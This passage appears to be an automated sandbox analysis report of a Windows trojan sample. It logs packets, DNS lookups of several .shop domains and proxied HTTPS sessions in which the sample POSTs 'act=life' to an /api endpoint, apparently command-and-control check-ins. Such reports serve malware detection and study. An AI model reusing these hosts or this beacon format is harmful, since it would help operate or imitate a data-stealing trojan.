                                                                        Sep 26, 2024 21:26:19.027841091 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.027935028 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.028254986 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.028275967 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.520780087 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.520947933 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.538970947 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.539071083 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.539505959 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.550236940 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.550292015 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.550369978 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.968388081 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.968512058 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:19.968600988 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.968741894 CEST49739443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:19.968782902 CEST44349739188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.025494099 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.025531054 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.025599957 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.025963068 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.025979042 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.494852066 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.494914055 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.496798992 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.496810913 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.497142076 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.498338938 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.498370886 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:20.498419046 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.986597061 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.986772060 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:20.986818075 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:21.323574066 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:21.323604107 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:21.323621988 CEST49740443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:21.323630095 CEST44349740188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:21.514677048 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.514786005 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:21.514889002 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.515316963 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.515357018 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:21.992304087 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:21.992399931 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.994525909 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.994544983 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:21.994885921 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:21.996669054 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.996714115 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:21.996761084 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:22.456778049 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:22.457015991 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:22.457099915 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:22.457307100 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:22.457364082 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:22.457396030 CEST49741443192.168.2.4172.67.162.108
                                                                        Sep 26, 2024 21:26:22.457412004 CEST44349741172.67.162.108192.168.2.4
                                                                        Sep 26, 2024 21:26:22.475730896 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.475816965 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.475908995 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.476278067 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.476314068 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.980078936 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.980218887 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.989341974 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.989370108 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.989790916 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.992459059 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.992496967 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.992558956 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482184887 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482472897 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482647896 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:23.482803106 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:23.482846975 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482877970 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:23.482894897 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.672992945 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:23.673039913 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.673124075 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:23.673470974 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:23.673484087 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.184247971 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.184473038 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.328013897 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.328030109 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.329027891 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.335340977 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.335397005 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.335519075 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736649036 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736766100 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736807108 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.736903906 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.736921072 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736931086 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.736936092 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.755954027 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:24.756089926 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:24.756170034 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:24.756663084 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:24.756704092 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.241941929 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.242032051 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.243489981 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.243541956 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.243952036 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.245131969 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.245176077 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.245239973 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.664123058 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.664361954 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.664433956 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.666843891 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.666914940 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.666965961 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:25.667002916 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:25.757353067 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:25.757392883 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:25.757456064 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:25.757725000 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:25.757740021 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.397069931 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.397182941 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.401381016 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.401412010 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.401768923 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.402882099 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.447402000 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950088978 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950120926 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950145960 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.950182915 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:26.950197935 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:26.950246096 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.051290989 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.051318884 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.051352978 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.051408052 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.051430941 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.051459074 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057090998 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057166100 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057185888 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057223082 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057260990 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057281017 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057307959 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057320118 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057320118 CEST49745443192.168.2.4104.102.49.254
                                                                        Sep 26, 2024 21:26:27.057327986 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.057333946 CEST44349745104.102.49.254192.168.2.4
                                                                        Sep 26, 2024 21:26:27.072716951 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.072829962 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.075135946 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.075900078 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.075936079 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.581589937 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.581682920 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.583129883 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.583168983 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.583530903 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:27.584635973 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.584681034 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:27.584733963 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033375025 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033488035 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033555984 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:28.033736944 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:28.033782005 CEST44349746172.67.128.144192.168.2.4
                                                                        Sep 26, 2024 21:26:28.033808947 CEST49746443192.168.2.4172.67.128.144
                                                                        Sep 26, 2024 21:26:28.033824921 CEST44349746172.67.128.144192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 26, 2024 21:26:16.070451975 CEST5494053192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:16.095346928 CEST53549401.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:17.088211060 CEST5340953192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:17.106355906 CEST53534091.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:18.999444962 CEST6171853192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:19.026995897 CEST53617181.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:20.003263950 CEST5499953192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:20.024143934 CEST53549991.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:21.498032093 CEST6029053192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:21.513864040 CEST53602901.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:22.460223913 CEST5379853192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:22.474739075 CEST53537981.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:23.625767946 CEST5228953192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:23.641207933 CEST53522891.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:24.738372087 CEST5235953192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:24.755327940 CEST53523591.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:25.749514103 CEST5087853192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:25.756768942 CEST53508781.1.1.1192.168.2.4
                                                                        Sep 26, 2024 21:26:27.058583021 CEST4966553192.168.2.41.1.1.1
                                                                        Sep 26, 2024 21:26:27.070909977 CEST53496651.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Sep 26, 2024 21:26:16.070451975 CEST192.168.2.41.1.1.10x96a6Standard query (0)ghostreedmnu.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:17.088211060 CEST192.168.2.41.1.1.10x6542Standard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:18.999444962 CEST192.168.2.41.1.1.10x1f2dStandard query (0)offensivedzvju.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:20.003263950 CEST192.168.2.41.1.1.10x14c2Standard query (0)vozmeatillu.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:21.498032093 CEST192.168.2.41.1.1.10xa3c7Standard query (0)drawzhotdog.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:22.460223913 CEST192.168.2.41.1.1.10x85a8Standard query (0)fragnantbui.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:23.625767946 CEST192.168.2.41.1.1.10xc511Standard query (0)stogeneratmns.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:24.738372087 CEST192.168.2.41.1.1.10x5fa5Standard query (0)reinforcenh.shopA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:25.749514103 CEST192.168.2.41.1.1.10x856aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:27.058583021 CEST192.168.2.41.1.1.10xcef9Standard query (0)ballotnwu.siteA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Sep 26, 2024 21:26:16.095346928 CEST1.1.1.1192.168.2.40x96a6No error (0)ghostreedmnu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:16.095346928 CEST1.1.1.1192.168.2.40x96a6No error (0)ghostreedmnu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:17.106355906 CEST1.1.1.1192.168.2.40x6542No error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:17.106355906 CEST1.1.1.1192.168.2.40x6542No error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:19.026995897 CEST1.1.1.1192.168.2.40x1f2dNo error (0)offensivedzvju.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:19.026995897 CEST1.1.1.1192.168.2.40x1f2dNo error (0)offensivedzvju.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:20.024143934 CEST1.1.1.1192.168.2.40x14c2No error (0)vozmeatillu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:20.024143934 CEST1.1.1.1192.168.2.40x14c2No error (0)vozmeatillu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:21.513864040 CEST1.1.1.1192.168.2.40xa3c7No error (0)drawzhotdog.shop172.67.162.108A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:21.513864040 CEST1.1.1.1192.168.2.40xa3c7No error (0)drawzhotdog.shop104.21.58.182A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:22.474739075 CEST1.1.1.1192.168.2.40x85a8No error (0)fragnantbui.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:22.474739075 CEST1.1.1.1192.168.2.40x85a8No error (0)fragnantbui.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:23.641207933 CEST1.1.1.1192.168.2.40xc511No error (0)stogeneratmns.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:23.641207933 CEST1.1.1.1192.168.2.40xc511No error (0)stogeneratmns.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:24.755327940 CEST1.1.1.1192.168.2.40x5fa5No error (0)reinforcenh.shop172.67.208.139A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:24.755327940 CEST1.1.1.1192.168.2.40x5fa5No error (0)reinforcenh.shop104.21.77.130A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:25.756768942 CEST1.1.1.1192.168.2.40x856aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:27.070909977 CEST1.1.1.1192.168.2.40xcef9No error (0)ballotnwu.site172.67.128.144A (IP address)IN (0x0001)false
                                                                        Sep 26, 2024 21:26:27.070909977 CEST1.1.1.1192.168.2.40xcef9No error (0)ballotnwu.site104.21.2.13A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • ghostreedmnu.shop
                                                                        • gutterydhowi.shop
                                                                        • offensivedzvju.shop
                                                                        • vozmeatillu.shop
                                                                        • drawzhotdog.shop
                                                                        • fragnantbui.shop
                                                                        • stogeneratmns.shop
                                                                        • reinforcenh.shop
                                                                        • steamcommunity.com
                                                                        • ballotnwu.site

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449734188.114.97.34437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:16 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: ghostreedmnu.shop
                                                                        2024-09-26 19:26:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:17 UTC772INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=kbrc0igl62dj3sj8vhcdji8ko5; expires=Mon, 20 Jan 2025 13:12:55 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hq5b7SiFKO5EtFpmSQJVSMZj4MMaceiGrTQJTkId%2B7ht0cK5r4uCgpmucqL8rvZZOVYuJK9hzsxagSU6ieCHkVkioTJf4RGEpTwwCHg7nZDjBNIZKungDx6QcVNIWrkFm%2FLjKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a50a58cb0fa1-EWR
                                                                        2024-09-26 19:26:17 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449736104.21.4.1364437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:17 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: gutterydhowi.shop
                                                                        2024-09-26 19:26:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:18 UTC774INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=631tgcvgvmuptq7vqju305qhba; expires=Mon, 20 Jan 2025 13:12:56 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4l7WATWdSZnP9EyZMoPggVQr4X4rkcnqdCKMsIxzCgkUzwGQZ2kwl3%2FNV9DNII3U7SmpESdHYEqAiE2o4B2LrJcnontmr6EfyPUjPkwAQi17ZY%2BMG4Nz%2BBkv2qIddQvMPvI9qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a510acf51871-EWR
                                                                        2024-09-26 19:26:18 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449738188.114.97.34437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:18 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: ghostreedmnu.shop
                                                                        2024-09-26 19:26:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:18 UTC774INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=84o3vl4n5adfiaos2j66st9t8c; expires=Mon, 20 Jan 2025 13:12:57 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGPMZA6Kh7W%2F%2BPZECbPBwOgq4kVtmaBQWk8Rl4MJZEVg6zbC41bj8ZbAbouzVf5%2FG9P7KvMeHFmYi1SnEicvG76yys9HbIgMUyO08euuzDi8OSh7CZOXzY7KA2LFBwCdkVPJhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a5166e5c19d7-EWR
                                                                        2024-09-26 19:26:18 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
